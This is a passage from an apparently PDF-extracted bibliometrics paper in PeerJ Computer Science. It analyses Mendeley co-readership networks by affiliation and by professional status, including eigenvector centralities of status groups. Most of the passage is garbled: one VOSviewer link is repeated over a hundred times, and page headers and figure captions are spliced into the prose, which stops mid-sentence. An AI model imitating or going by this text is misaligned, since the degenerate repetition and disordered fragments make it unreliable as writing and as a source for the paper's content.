http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3_map.txt&network=http://www.leydesdorff.net/mendeley/fig3_net.txt&n_lines=1000 http://dx.doi.org/10.7717/peerj-cs.32 Figure 2 71 affiliations in the bio-medical sciences (group 2 in yellow) and 84 affiliations in the natural sciences and engineering (group 3 in pink). Status hierarchy Mendeley users have to assign one of 14 predefined status groups to themselves. Some of these professional status groups seem redundant, such as “Student PhD”, “Student Post-Graduate”, and “Doctoral Student”. Any merging or regrouping of these status groups, however, would be a rather arbitrary choice (Haustein & Larivière, 2014a). We analyze the Mendeley reader counts in the status groups as provided by Mendeley and discuss these issues in the light of the results. Figure 4 shows that a common interest in papers is mainly shared among PhD students, Master’s students, and postdocs. Other studies confirm the dominant position of these groups (Zahedi, Costas & Wouters, 2014). In this study, researchers at academic institutions follow, but less so when compared with researchers at non-academic institutions. Lecturers and Senior Lecturers are less involved than Professors. Librarians hardly participate in this network. Note that this network is not modularized at all (Q = 0.0, cf. Table 1). All groups are fully connected to all (13) other groups. Haunschild et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.32 7/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.32 Figure 3 Four communities (colors) of affiliations among co-bookmarking readers. Figure 4 Network of co-readers in terms of professional status. Table 2 shows eigenvector centralities of the different status groups among networked Mendeley users (Bonacich, 1972). Groups with high eigenvector centrality (in this case, students) are more central, because they share their interests in publications with many other groups, while recursively taking into account the (eigenvector) centrality of these other groups (De Nooy, Mrvar & Batagelj, 2011). However, the very high eigenvector centrality is 